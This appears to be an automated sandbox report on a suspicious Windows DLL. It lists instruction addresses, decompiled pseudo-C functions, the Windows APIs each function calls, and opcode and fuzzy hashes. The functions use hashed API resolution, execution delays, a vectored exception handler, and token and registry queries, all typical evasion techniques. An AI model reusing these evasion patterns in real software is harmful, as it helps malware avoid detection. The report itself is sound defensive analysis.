0x00000000
0x6ec70aef
0x00000000
0x6ec70ae9
0x6ec70a8f
0x6ec70a92
0x00000000
0x00000000
0x6ec70a98
0x6ec70a9d
0x6ec70aa2
0x6ec70ac1
0x6ec70ac1
0x6ec70acb
0x00000000
0x6ec70acb
0x6ec70aa4
0x6ec70aa8
0x6ec70aaa
0x6ec70ab1
0x6ec70ab1
0x6ec70ab7
0x6ec70ab7
0x6ec70ab9
0x6ec70abc
0x6ec70abc
0x00000000
0x6ec70ab9
0x6ec70aac
0x6ec70aaf
0x6ec70ab5
0x6ec70ab5
0x00000000
0x6ec70ab5
0x00000000
0x6ec70aaf
0x6ec70a3e
0x6ec70a40
0x6ec70a7f
0x6ec70a82
0x6ec70df4
0x6ec70df9
0x6ec70dfe
0x6ec70e1d
0x6ec70e1d
0x6ec70e27
0x00000000
0x6ec70e27
0x6ec70e00
0x6ec70e04
0x6ec70e06
0x6ec70e0d
0x6ec70e0d
0x6ec70e13
0x6ec70e13
0x6ec70e15
0x6ec70e18
0x6ec70e18
0x00000000
0x6ec70e15
0x6ec70e08
0x6ec70e0b
0x6ec70e11
0x6ec70e11
0x00000000
0x6ec70e11
0x00000000
0x6ec70e0b
0x00000000
0x6ec70a88
0x6ec70a46
0x6ec70a4b
0x6ec70a50
0x6ec70a6f
0x6ec70a6f
0x6ec70a79
0x00000000
0x6ec70a79
0x6ec70a52
0x6ec70a56
0x6ec70a58
0x6ec70a5f
0x6ec70a5f
0x6ec70a65
0x6ec70a65
0x6ec70a67
0x6ec70a6a
0x6ec70a6a
0x00000000
0x6ec70a67
0x6ec70a5a
0x6ec70a5d
0x6ec70a63
0x6ec70a63
0x00000000
0x6ec70a63
0x00000000
0x6ec70a5d
0x6ec709f4
0x6ec709f6
0x00000000
0x00000000
0x6ec70a00
0x6ec70a05
0x6ec70a0a
0x6ec70a29
0x6ec70a29
0x6ec70a33
0x00000000
0x6ec70a33
0x6ec70a0c
0x6ec70a10
0x6ec70a12
0x6ec70a19
0x6ec70a19
0x6ec70a1f
0x6ec70a1f
0x6ec70a21
0x6ec70a24
0x6ec70a24
0x00000000
0x6ec70a21
0x6ec70a14
0x6ec70a17
0x6ec70a1d
0x6ec70a1d
0x00000000
0x6ec70a1d
0x00000000
0x6ec70a17
0x6ec70959
0x6ec7095e
0x6ec70963
0x6ec70982
0x6ec70982
0x6ec7098c
0x00000000
0x6ec7098c
0x6ec70965
0x6ec70969
0x6ec7096b
0x6ec70972
0x6ec70972
0x6ec70978
0x6ec70978
0x6ec7097a
0x6ec7097d
0x6ec7097d
0x00000000
0x6ec7097a
0x6ec7096d
0x6ec70970
0x6ec70976
0x6ec70976
0x00000000
0x6ec70976
0x00000000
0x6ec7089a
0x6ec7089c
0x6ec70b01
0x6ec70b06
0x6ec70b09
0x6ec70b0e
0x6ec70b10
0x6ec70b25
0x6ec70b28
0x6ec70bf6
0x6ec70bfe
0x6ec70c01
0x6ec70c16
0x6ec70c20
0x6ec70c20
0x6ec70c22
0x6ec70c24
0x6ec70c33
0x6ec70c3f
0x6ec70c43
0x6ec70c46
0x6ec70c49
0x6ec70c4c
0x00000000
0x6ec70c4c
0x6ec70b38
0x6ec70b4a
0x6ec70b4e
0x6ec70bda
0x6ec70bda
0x6ec70be0
0x6ec70beb
0x6ec70be2
0x6ec70be2
0x6ec70be2
0x00000000
0x6ec70be0
0x6ec70b5b
0x6ec70b5c
0x6ec70b5e
0x6ec70b64
0x6ec70fb3
0x6ec70fb8
0x6ec70fba
0x00000000
0x00000000
0x6ec70fc0
0x6ec70b7b
0x6ec70b7f
0x6ec70b84
0x6ec70b96
0x6ec70b9a
0x6ec70ba5
0x6ec70ba6
0x6ec70ba7
0x6ec70ba8
0x6ec70baa
0x6ec70bb5
0x6ec70e2d
0x6ec70e2d
0x6ec70bb5
0x6ec70bbb
0x6ec70bc4
0x6ec70e3f
0x6ec70e55
0x6ec70e57
0x6ec70e59
0x6ec70f94
0x6ec70f9b
0x00000000
0x6ec70f9b
0x6ec70e68
0x6ec70e76
0x6ec70e90
0x6ec70e92
0x6ec70e94
0x6ec70fa5
0x6ec70faa
0x6ec70fac
0x00000000
0x00000000
0x6ec70fae
0x6ec70ea8
0x6ec70eb3
0x6ec70ec2
0x6ec70ed4
0x6ec70ed6
0x6ec70ed8
0x6ec70ee5
0x6ec70ee5
0x6ec70ef5
0x6ec70f06
0x6ec70f0b
0x6ec70f0d
0x6ec70f0f
0x6ec70f16
0x6ec70f17
0x6ec70f17
0x6ec70f23
0x6ec70f44
0x6ec70f4d
0x6ec70f59
0x6ec70f65
0x6ec70f6a
0x6ec70f6f
0x6ec70f75
0x6ec70f75
0x6ec70f7a
0x6ec70f80
0x00000000
0x6ec70f86
0x6ec70f88
0x00000000
0x6ec70f88
0x6ec70bca
0x6ec70bca
0x6ec70bcf
0x6ec70bd5
0x6ec70bd5
0x00000000
0x6ec70bcf
0x6ec70bc4
0x6ec70898
0x6ec70808
0x6ec70809
0x6ec7080b
0x6ec70811
0x6ec70dde
0x6ec70de3
0x6ec70de5
0x00000000
0x00000000
0x6ec70deb
0x6ec70828
0x6ec7082c
0x6ec70831
0x6ec70847
0x6ec7085e
0x6ec70862
0x6ec70c5a
0x6ec70c5a
0x6ec70862
0x6ec70868
0x6ec70871
0x6ec70c69
0x6ec70c7a
0x6ec70c7f
0x6ec70c81
0x6ec70c83
0x6ec70db4
0x6ec70db8
0x00000000
0x6ec70db8
0x6ec70c8f
0x6ec70cb4
0x6ec70cb6
0x6ec70cb8
0x6ec70dd0
0x6ec70dd5
0x6ec70dd7
0x00000000
0x00000000
0x6ec70dd9
0x6ec70cc9
0x6ec70cd7
0x6ec70cde
0x6ec70cdf
0x6ec70ce0
0x6ec70cf2
0x6ec70cf4
0x6ec70cf6
0x00000000
0x00000000
0x6ec70cfe
0x6ec70d19
0x6ec70d1b
0x6ec70d1d
0x6ec70dc2
0x6ec70dc7
0x6ec70dc9
0x00000000
0x00000000
0x6ec70dcb
0x6ec70d23
0x6ec70d2a
0x6ec70d2e
0x6ec70d99
0x6ec70d99
0x6ec70d9b
0x6ec70da2
0x6ec70da2
0x6ec70da8
0x6ec70da8
0x6ec70daa
0x6ec70daf
0x6ec70daf
0x00000000
0x6ec70daa
0x6ec70d9d
0x6ec70da0
0x6ec70da6
0x6ec70da6
0x00000000
0x6ec70da6
0x00000000
0x6ec70da0
0x6ec70d30
0x6ec70d30
0x6ec70d32
0x6ec70d3e
0x6ec70d43
0x6ec70d45
0x00000000
0x00000000
0x6ec70d47
0x6ec70d4b
0x6ec70d52
0x6ec70d53
0x6ec70d54
0x6ec70d56
0x00000000
0x00000000
0x6ec70d58
0x6ec70d5a
0x6ec70d61
0x6ec70d61
0x6ec70d67
0x6ec70d67
0x6ec70d69
0x6ec70d6e
0x6ec70d6e
0x6ec70d77
0x6ec70d7c
0x6ec70d81
0x6ec70d87
0x6ec70d87
0x6ec70d8c
0x00000000
0x6ec70d8c
0x6ec70d5c
0x6ec70d5f
0x6ec70d65
0x6ec70d65
0x00000000
0x6ec70d65
0x00000000
0x6ec70d93
0x6ec70d93
0x6ec70d94
0x6ec70d94
0x00000000
0x6ec70d32
0x6ec70877
0x6ec7087c
0x6ec70882
0x6ec70882
0x00000000
0x6ec70c59
0x6ec70c59
0x6ec70c59

APIs

GetTokenInformation.KERNELBASE(?,00000002,00000000,00000000,00000000,150C05FC,150C05FC), ref: 6EC7085E
GetSystemInfo.KERNELBASE(?,8E844D1E,8E844D1E,?,?,360D0C74,?,?,1E55AAEC,?,?,C0092A94,00000000,80000002,00000000,-000000FC), ref: 6EC70C20
GetTokenInformation.KERNELBASE(?,00000002,00000000,00000000,00000000,00000000,150C05FC,150C05FC,00000000,150C05FC,150C05FC), ref: 6EC70CB4

Memory Dump Source

Source File: 00000000.00000002.817398169.000000006EC61000.00000020.00020000.sdmp, Offset: 6EC60000, based on PE: true

Associated: 00000000.00000002.817389361.000000006EC60000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.817452739.000000006EC7A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.817466716.000000006EC7D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.817479037.000000006EC7F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: InformationToken$InfoSystem
String ID:
API String ID: 298373132-0
Opcode ID: c173b27ac6a17db1f6638443abec9893975f3c0784891094077f2bce7be4b900
Instruction ID: 170c2f566dbad99ed81a8c9278fb2f0f63d7b47589b14c0904a5ffa636a33344
Opcode Fuzzy Hash: c173b27ac6a17db1f6638443abec9893975f3c0784891094077f2bce7be4b900
Instruction Fuzzy Hash: EE220A702083419FEF70DBA9C891BDF77A9AF81318F10891DE89497299FB72D905C752

Uniqueness

Uniqueness Score: -1.00%

Function 6EC72234, Relevance: 1.5, APIs: 1, Instructions: 30
nativeCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E6EC72234(void* __ecx, intOrPtr __edx, void* __esi) {
				intOrPtr _v4;
				intOrPtr _v20;
				intOrPtr* _t5;
				intOrPtr _t11;
				intOrPtr* _t13;
				intOrPtr* _t15;

				_t11 = __edx;
				if(__ecx == 0) {
					 *_t15 = 0;
					_v4 = 0;
				} else {
					 *_t15 = E6EC73AF8(0xffffd8f0, 0xffffffff, __ecx, 0);
					_v20 = _t11;
				}
				_t5 = E6EC7306C(0x60a28c5c, 0x11cab064, 0x60a28c5c, 0x60a28c5c);
				_t13 = _t5;
				if(_t13 != 0) {
					_t5 =  *_t13(0, _t15); // executed
				}
				return _t5;
			}

0x6ec72234
0x6ec72238
0x6ec72254
0x6ec72257
0x6ec7223a
0x6ec72249
0x6ec7224c
0x6ec7224c
0x6ec72267
0x6ec7226c
0x6ec72270
0x6ec72278
0x6ec72278
0x6ec7227c

APIs

NtDelayExecution.NTDLL(00000000,00000000,60A28C5C,60A28C5C,FFFFFFFF,FFFFFFFF,6EC64B17,00000000,00000000,?), ref: 6EC72278

Memory Dump Source

Source File: 00000000.00000002.817398169.000000006EC61000.00000020.00020000.sdmp, Offset: 6EC60000, based on PE: true

Associated: 00000000.00000002.817389361.000000006EC60000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.817452739.000000006EC7A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.817466716.000000006EC7D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.817479037.000000006EC7F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: DelayExecution
String ID:
API String ID: 1249177460-0
Opcode ID: 2c9c5e460e6a6f6e58fad2ac9a5298f00f0cc66bf3291dc41720851ba70b474b
Instruction ID: 2366f7e9dc6903683375e52c8fba8ad72cdecdef127869b1c52baa495074fada
Opcode Fuzzy Hash: 2c9c5e460e6a6f6e58fad2ac9a5298f00f0cc66bf3291dc41720851ba70b474b
Instruction Fuzzy Hash: 99E065B020E302ADEF6896AD9C15B6B36D8AF84620F20892CB5A8D7288F670D4018361

Uniqueness

Uniqueness Score: -1.00%

Function 6EC72820, Relevance: 1.5, APIs: 1, Instructions: 29
memorynativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6EC72820(void* __ecx, long __edx, void* __esi, long _a4, long _a8, void* _a12) {
				long _v4;
				void* _t8;
				long _t10;
				PVOID* _t19;

				_v4 = __edx;
				 *_t19 = __ecx;
				if(E6EC7306C(0x60a28c5c, 0x414fdf7, 0x60a28c5c, 0x60a28c5c) == 0) {
					L3:
					_t8 =  *_t19;
				} else {
					_t10 = NtAllocateVirtualMemory(_a12, _t19, 0,  &_v4, _a4, _a8); // executed
					if(_t10 == 0) {
						goto L3;
					} else {
						_t8 = 0;
					}
				}
				return _t8;
			}

0x6ec72827
0x6ec72830
0x6ec7283e
0x6ec72861
0x6ec72861
0x6ec72840
0x6ec72857
0x6ec7285b
0x00000000
0x6ec7285d
0x6ec7285d
0x6ec7285d
0x6ec7285b
0x6ec72866

APIs

NtAllocateVirtualMemory.NTDLL(6EC788E6,?,00000000,000000FF,6EC788E6,6EC788E6,60A28C5C,60A28C5C,?,?,6EC788E6,00003000,00000004,000000FF), ref: 6EC72857

Memory Dump Source

Source File: 00000000.00000002.817398169.000000006EC61000.00000020.00020000.sdmp, Offset: 6EC60000, based on PE: true

Associated: 00000000.00000002.817389361.000000006EC60000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.817452739.000000006EC7A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.817466716.000000006EC7D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.817479037.000000006EC7F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: 1b6e0df76e67549dfb1e774fc107f98af224613b3e03ad2134b0c600fba901d1
Instruction ID: cced58ede7ab7d9d38faa0b3d2ea08a94cdf118223646f67e3bcda0057045851
Opcode Fuzzy Hash: 1b6e0df76e67549dfb1e774fc107f98af224613b3e03ad2134b0c600fba901d1
Instruction Fuzzy Hash: 57E039B2209342AFEF18CA9ACC24E6BB7E9EF84604F108C2DB494C6250E731D8009721

Uniqueness

Uniqueness Score: -1.00%

Function 6EC73138, Relevance: 1.5, APIs: 1, Instructions: 4
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E6EC73138(intOrPtr* __ecx) {
				void* _t1;

				_push(E6EC734B0);
				_push(1); // executed
				_t1 =  *__ecx(); // executed
				return _t1;
			}

0x6ec73138
0x6ec7313d
0x6ec7313f
0x6ec73141

APIs

RtlAddVectoredExceptionHandler.NTDLL(00000001,6EC734B0,6EC73128,60A28C5C,60A28C5C,?,6EC66C99,00000000), ref: 6EC7313F

Memory Dump Source

Source File: 00000000.00000002.817398169.000000006EC61000.00000020.00020000.sdmp, Offset: 6EC60000, based on PE: true

Associated: 00000000.00000002.817389361.000000006EC60000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.817452739.000000006EC7A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.817466716.000000006EC7D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.817479037.000000006EC7F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: ExceptionHandlerVectored
String ID:
API String ID: 3310709589-0
Opcode ID: 0c8e37c3bdaa1b9bfa98be4d29b285940c84a3c20b21182520cde323230c21ee
Instruction ID: b34644bbe7aa0ab547ec4f0c1776c9f422e4f743afd38a48fd66a0fc2f1b879f
Opcode Fuzzy Hash: 0c8e37c3bdaa1b9bfa98be4d29b285940c84a3c20b21182520cde323230c21ee
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 6EC710A4, Relevance: 3.2, APIs: 2, Instructions: 153
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E6EC710A4(void* __ebx, void* __ecx) {
				intOrPtr* _t34;
				long* _t55;
				long* _t59;
				intOrPtr* _t64;
				void* _t73;
				void* _t74;
				void* _t79;
				long* _t80;

				_t74 = __ecx;
				_t80[7] = 0;
				_t64 = E6EC7306C(0x150c05fc, 0x1da4d409, 0x150c05fc, 0x150c05fc);
				if(_t64 != 0) {
					 *_t64(_t74, 8,  &(_t80[7]));
				}
				_t55 = _t80;
				 *_t55 = _t80[7];
				_t55[1] = 1;
				if(E6EC6C280(_t55) != 0) {
					L6:
					if(_t80[1] != 0) {
						E6EC6BB44(_t80);
					}
					return 0;
				}
				_t80[6] = 0;
				if(E6EC7306C(0x150c05fc, 0xf2377aa1, 0x150c05fc, 0x150c05fc) != 0) {
					GetTokenInformation(_t80[4], 0x19, 0, 0,  &(_t80[6])); // executed
				}
				_t30 = _t80[6];
				if(_t80[6] != 0) {
					E6EC6F584( &(_t80[3]), _t30);
					_t59 =  &(_t80[3]);
					_t73 = E6EC6F4BC(_t59, 0);
					_t34 = E6EC7306C(0x150c05fc, 0xf2377aa1, 0x150c05fc, 0x150c05fc);
					if (_t34 == 0) goto L33;
					 *_t34 =  *_t34 + _t34;
					 *((intOrPtr*)(_t79 + 0x50182444)) =  *((intOrPtr*)(_t79 + 0x50182444)) + _t59;
				} else {
					goto L6;
				}
			}

0x6ec710b3
0x6ec710b5
0x6ec710c4
0x6ec710c8
0x6ec710d2
0x6ec710d2
0x6ec710d8
0x6ec710db
0x6ec710dd
0x6ec710e8
0x6ec71122
0x6ec71127
0x6ec7112c
0x6ec7112c
0x00000000
0x6ec71131
0x6ec710f4
0x6ec71107
0x6ec71118
0x6ec71118
0x6ec7111a
0x6ec71120
0x6ec7113e
0x6ec71145
0x6ec7114e
0x6ec7115c
0x6ec71165
0x6ec71168
0x6ec7116a
0x00000000
0x00000000
0x00000000

APIs

GetTokenInformation.KERNELBASE(?,00000019,00000000,00000000,00000000,150C05FC,150C05FC,150C05FC,150C05FC), ref: 6EC71118
GetTokenInformation.KERNELBASE(?,00000019,00000000,00000000,00000000,150C05FC,150C05FC,00000000,00000000,150C05FC,150C05FC,150C05FC,150C05FC), ref: 6EC7117B

Memory Dump Source

Source File: 00000000.00000002.817398169.000000006EC61000.00000020.00020000.sdmp, Offset: 6EC60000, based on PE: true

Associated: 00000000.00000002.817389361.000000006EC60000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.817452739.000000006EC7A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.817466716.000000006EC7D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.817479037.000000006EC7F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: InformationToken
String ID:
API String ID: 4114910276-0
Opcode ID: d4114acdae47b760778368f229c105cfa951edf473a092887fb2ca255ca5d737
Instruction ID: 3763f7eeb9e1a157e85a2ee192d1a73c4cc419ca33f83629123b6e2f552ebfb9
Opcode Fuzzy Hash: d4114acdae47b760778368f229c105cfa951edf473a092887fb2ca255ca5d737
Instruction Fuzzy Hash: 1741C870244242ABEF65D9ED9870BAF77DD9B85704F108828B9A0CA198FB64CC49C751

Uniqueness

Uniqueness Score: -1.00%

Function 6EC757B4, Relevance: 3.1, APIs: 2, Instructions: 74
registryCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E6EC757B4(void* __ecx, char* _a4, intOrPtr _a8) {
				int _v16;
				int _v20;
				intOrPtr _t11;
				int* _t12;
				int _t13;
				void* _t23;
				char* _t35;
				int* _t38;

				_push(_t34);
				_t23 = __ecx;
				_t11 =  *((intOrPtr*)(__ecx + 4));
				if(_t11 == 0 || _t11 == 0xffffffff) {
					_t12 = 1;
				} else {
					_t12 = 0;
				}
				if(_t12 != 0) {
					L10:
					_t13 = 0;
				} else {
					_t35 = _a4;
					if(_t35 == 0 ||  *_t35 != 0) {
						_v20 = 0;
						_v16 = 0;
						if(E6EC73064(0x150c05fc, 0x545b7fe2) != 0) {
							RegQueryValueExA( *(_t23 + 4), _t35, 0, _t38, 0,  &_v16); // executed
						}
						_t15 = _v16;
						if(_v16 != 0) {
							E6EC6F828(_a8, _t15);
							if(E6EC73064(0x150c05fc, 0x545b7fe2) != 0) {
								RegQueryValueExA( *(_t23 + 4), _t35, 0, _t38, E6EC6F4BC(_a8, 0),  &_v20); // executed
							}
							_t13 = _v20;
						} else {
							goto L10;
						}
					} else {
						goto L10;
					}
				}
				return _t13;
			}

0x6ec757b8
0x6ec757b9
0x6ec757bb
0x6ec757c0
0x6ec757c7
0x6ec757cb
0x6ec757cb
0x6ec757cb
0x6ec757cf
0x6ec75815
0x6ec75815
0x6ec757d1
0x6ec757d1
0x6ec757d7
0x6ec757e0
0x6ec757e3
0x6ec757fa
0x6ec7580b
0x6ec7580b
0x6ec7580d
0x6ec75813
0x6ec7581e
0x6ec75836
0x6ec75856
0x6ec75856
0x6ec75858
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x6ec757d7
0x6ec75860

APIs

RegQueryValueExA.KERNELBASE(?,6EC7D1F8,00000000,?,00000000,00000000,?,?,?,6EC7D1F8,?,6EC75887,?,00000000,00000000), ref: 6EC7580B
RegQueryValueExA.KERNELBASE(?,6EC7D1F8,00000000,?,00000000,00000000,00000000,00000000,?,?,?,6EC7D1F8,?,6EC75887,?,00000000), ref: 6EC75856

Memory Dump Source

Source File: 00000000.00000002.817398169.000000006EC61000.00000020.00020000.sdmp, Offset: 6EC60000, based on PE: true

Associated: 00000000.00000002.817389361.000000006EC60000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.817452739.000000006EC7A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.817466716.000000006EC7D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.817479037.000000006EC7F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 1efe9e4701dbfa3cada60aee337f192807569c167ced025668ece5e7b2494b7e
Instruction ID: d372a1817d701c2ab6f50d372121b566c6a8770e89bb8f87b7e141fe9bb03bc4
Opcode Fuzzy Hash: 1efe9e4701dbfa3cada60aee337f192807569c167ced025668ece5e7b2494b7e
Instruction Fuzzy Hash: F711723125D305EBDA609AA99C90EABBBDCEF46754F10891DB49497145FB21E800CB61

Uniqueness

Uniqueness Score: -1.00%

Function 6EC75B3C, Relevance: 1.6, APIs: 1, Instructions: 123
COMMON

Download Yara Rule

C-Code - Quality: 65%

			E6EC75B3C(WCHAR** __ecx, void* __edx, intOrPtr _a4, long _a8, long _a12) {
				char _v24;
				void* __esi;
				void* _t16;
				void* _t30;
				long _t37;
				void* _t38;
				long _t39;
				WCHAR** _t40;
				intOrPtr* _t55;
				WCHAR** _t56;
				char* _t59;
				long _t60;

				_t56 = __ecx;
				_t37 = _a8;
				if(E6EC6D1CC(__ecx, 0x2f) != 0) {
					_t58 = _t60;
					E6EC6D6D0(__ecx, _t60);
					E6EC6CFF8(_t56,  *_t60);
					E6EC6CFDC(_t60);
				}
				if(_t37 == 0) {
					_t64 = _a4 - 1;
					if(_a4 != 1) {
						__eflags = _a4 - 4;
						_t37 = (0 | _a4 == 0x00000004) + 2;
						__eflags = _t37;
					} else {
						_t37 = 1;
					}
				}
				E6EC762B0(_t64);
				if(_a4 > 5) {
					_t58 = 0;
					if(_t37 != 2) {
						_t16 = 3;
						__eflags = _t37 - 1;
						_t38 = 0;
						_t39 =  ==  ? _t16 : _t38;
					} else {
						_t39 = 1;
					}
					if(E6EC73064(0x8e844d1e, 0x458d3b35) == 0) {
						_push(0);
					} else {
						_t30 = CreateFileW( *_t56, 0, _t39, 0, _t58, _a12, 0); // executed
						_push(_t30);
					}
					_t40 =  &(_t56[3]);
					E6EC6C26C(_t40);
					if(E6EC6C280(_t40) != 0) {
						_t56[2] = E6EC735F0(0);
						return 0;
					} else {
						if(_a4 == 2) {
							_t55 = E6EC73064(0x8e844d1e, 0xba53868);
							__eflags = _t55;
							if(_t55 != 0) {
								 *_t55( *_t40, 0, 0, 2);
							}
						}
						_t59 =  &_v24;
						E6EC73698(_t59, 0xff, 8);
						if(E6EC73064(0x8e844d1e, 0xc5e2981f) != 0) {
							_push(_t59);
							_push(_t59);
							_push(0);
							_push( *_t40);
							asm("int3");
							asm("int3");
						}
						return 1;
					}
				} else {
					goto __eax;
				}
			}

0x6ec75b43
0x6ec75b45
0x6ec75b52
0x6ec75b56
0x6ec75b5a
0x6ec75b64
0x6ec75b6b
0x6ec75b6b
0x6ec75b72
0x6ec75b74
0x6ec75b79
0x6ec75b82
0x6ec75b8a
0x6ec75b8a
0x6ec75b7b
0x6ec75b7d
0x6ec75b7d
0x6ec75b79
0x6ec75b8f
0x6ec75b9b
0x6ec75ccc
0x6ec75c09
0x6ec75c12
0x6ec75c13
0x6ec75c18
0x6ec75c19
0x6ec75c0b
0x6ec75c0d
0x6ec75c0d
0x6ec75c2f
0x6ec75c43
0x6ec75c31
0x6ec75c3e
0x6ec75c40
0x6ec75c40
0x6ec75c45
0x6ec75c4a
0x6ec75c58
0x6ec75cc3
0x00000000
0x6ec75c5a
0x6ec75c5f
0x6ec75cac
0x6ec75cae
0x6ec75cb0
0x6ec75cba
0x6ec75cba
0x6ec75cb0
0x6ec75c61
0x6ec75c6d
0x6ec75c86
0x6ec75c88
0x6ec75c89
0x6ec75c8a
0x6ec75c8c
0x6ec75c8e
0x6ec75c8f
0x6ec75c8f
0x00000000
0x6ec75c92
0x6ec75ba1
0x6ec75bb1
0x6ec75bb1

Memory Dump Source

Source File: 00000000.00000002.817398169.000000006EC61000.00000020.00020000.sdmp, Offset: 6EC60000, based on PE: true

Associated: 00000000.00000002.817389361.000000006EC60000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.817452739.000000006EC7A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.817466716.000000006EC7D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.817479037.000000006EC7F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 017b2af716e66704e9e3cb937f3c1c74599c82ee1cc0bb1aaf5a7ebe0d30803c
Instruction ID: bf2fac22a79567795dc5ab55e684700eccddc08bfa1ff54ad05986234582903d
Opcode Fuzzy Hash: 017b2af716e66704e9e3cb937f3c1c74599c82ee1cc0bb1aaf5a7ebe0d30803c
Instruction Fuzzy Hash: E131067034430ABEEF602AFA4D94F7B7A9DEB85648F104C39F95195189FE219804C261

Uniqueness

Uniqueness Score: -1.00%

Function 6EC71166, Relevance: 1.6, APIs: 1, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6EC71166(intOrPtr* __eax, void* __ebx, void* __ecx) {
				void* _t20;

				 *__eax =  *__eax + __eax;
				 *((intOrPtr*)(_t20 + 0x50182444)) =  *((intOrPtr*)(_t20 + 0x50182444)) + __ecx;
			}

0x6ec71168
0x6ec7116a

APIs

GetTokenInformation.KERNELBASE(?,00000019,00000000,00000000,00000000,150C05FC,150C05FC,00000000,00000000,150C05FC,150C05FC,150C05FC,150C05FC), ref: 6EC7117B

Memory Dump Source

Source File: 00000000.00000002.817398169.000000006EC61000.00000020.00020000.sdmp, Offset: 6EC60000, based on PE: true

Associated: 00000000.00000002.817389361.000000006EC60000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.817452739.000000006EC7A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.817466716.000000006EC7D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.817479037.000000006EC7F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: InformationToken
String ID:
API String ID: 4114910276-0
Opcode ID: 8162e476bed466b15e8bf967a0abe15d034c35eef06e00be9545f18c94d02dd7
Instruction ID: ff6c138cc401605c3e8148e0eee8b51a90445e1970767bee8b664d72fc0e2b46
Opcode Fuzzy Hash: 8162e476bed466b15e8bf967a0abe15d034c35eef06e00be9545f18c94d02dd7
Instruction Fuzzy Hash: 9711CA706042835AFF7695ED9870BAF76589F82740F104865EC70DA0ECFA24CC49C666

Uniqueness

Uniqueness Score: -1.00%

Function 6EC75BE5, Relevance: 1.6, APIs: 1, Instructions: 65
fileCOMMON

Download Yara Rule

C-Code - Quality: 51%

			E6EC75BE5(void* __ecx, void* __edx, WCHAR** __edi, void* _a4, void* _a32, long _a44) {
				void* _t7;
				void* _t12;
				void* _t20;
				void* _t21;
				void* _t22;
				long _t23;
				WCHAR** _t24;
				intOrPtr* _t32;
				WCHAR** _t33;
				long _t37;
				void* _t39;
				void* _t40;

				_t33 = __edi;
				if(__edx != 0) {
					_t37 = 3;
					if(_t21 != 2) {
						_t7 = 3;
						_t22 = 0;
						_t23 =  ==  ? _t7 : _t22;
					} else {
						_t23 = 1;
					}
					if(E6EC73064(0x8e844d1e, 0x458d3b35) == 0) {
						_push(0);
					} else {
						_t20 = CreateFileW( *_t33, 0x80000000, _t23, 0, _t37, _a44, 0); // executed
						_push(_t20);
					}
					_t24 =  &(_t33[3]);
					E6EC6C26C(_t24);
					if(E6EC6C280(_t24) != 0) {
						_t33[2] = E6EC735F0(0x80000000);
						_t12 = 0;
					} else {
						if( *((intOrPtr*)(_t40 + 0x24)) == 2) {
							_t32 = E6EC73064(0x8e844d1e, 0xba53868);
							if(_t32 != 0) {
								 *_t32( *_t24, 0, 0, 2);
							}
						}
						_t39 = _t40 + 8;
						E6EC73698(_t39, 0xff, 8);
						_t40 = _t40 + 0xc;
						if(E6EC73064(0x8e844d1e, 0xc5e2981f) != 0) {
							_push(_t39);
							_push(_t39);
							_push(0);
							_push( *_t24);
							asm("int3");
							asm("int3");
						}
						_t12 = 1;
					}
				} else {
					__edi[2] = 2;
					_t12 = 0;
				}
				return _t12;
			}

0x6ec75be5
0x6ec75be7
0x6ec75bfe
0x6ec75c09
0x6ec75c12
0x6ec75c18
0x6ec75c19
0x6ec75c0b
0x6ec75c0d
0x6ec75c0d
0x6ec75c2f
0x6ec75c43
0x6ec75c31
0x6ec75c3e
0x6ec75c40
0x6ec75c40
0x6ec75c45
0x6ec75c4a
0x6ec75c58
0x6ec75cc3
0x6ec75cc6
0x6ec75c5a
0x6ec75c5f
0x6ec75cac
0x6ec75cb0
0x6ec75cba
0x6ec75cba
0x6ec75cb0
0x6ec75c61
0x6ec75c6d
0x6ec75c72
0x6ec75c86
0x6ec75c88
0x6ec75c89
0x6ec75c8a
0x6ec75c8c
0x6ec75c8e
0x6ec75c8f
0x6ec75c8f
0x6ec75c92
0x6ec75c92
0x6ec75be9
0x6ec75be9
0x6ec75bf0
0x6ec75bf0
0x6ec75c9a

APIs

CreateFileW.KERNELBASE(?,00000000,00000000,00000000,00000000,?,00000000,8E844D1E,458D3B35), ref: 6EC75C3E

Memory Dump Source

Source File: 00000000.00000002.817398169.000000006EC61000.00000020.00020000.sdmp, Offset: 6EC60000, based on PE: true

Associated: 00000000.00000002.817389361.000000006EC60000.00000002.00020000.sdmp Download File
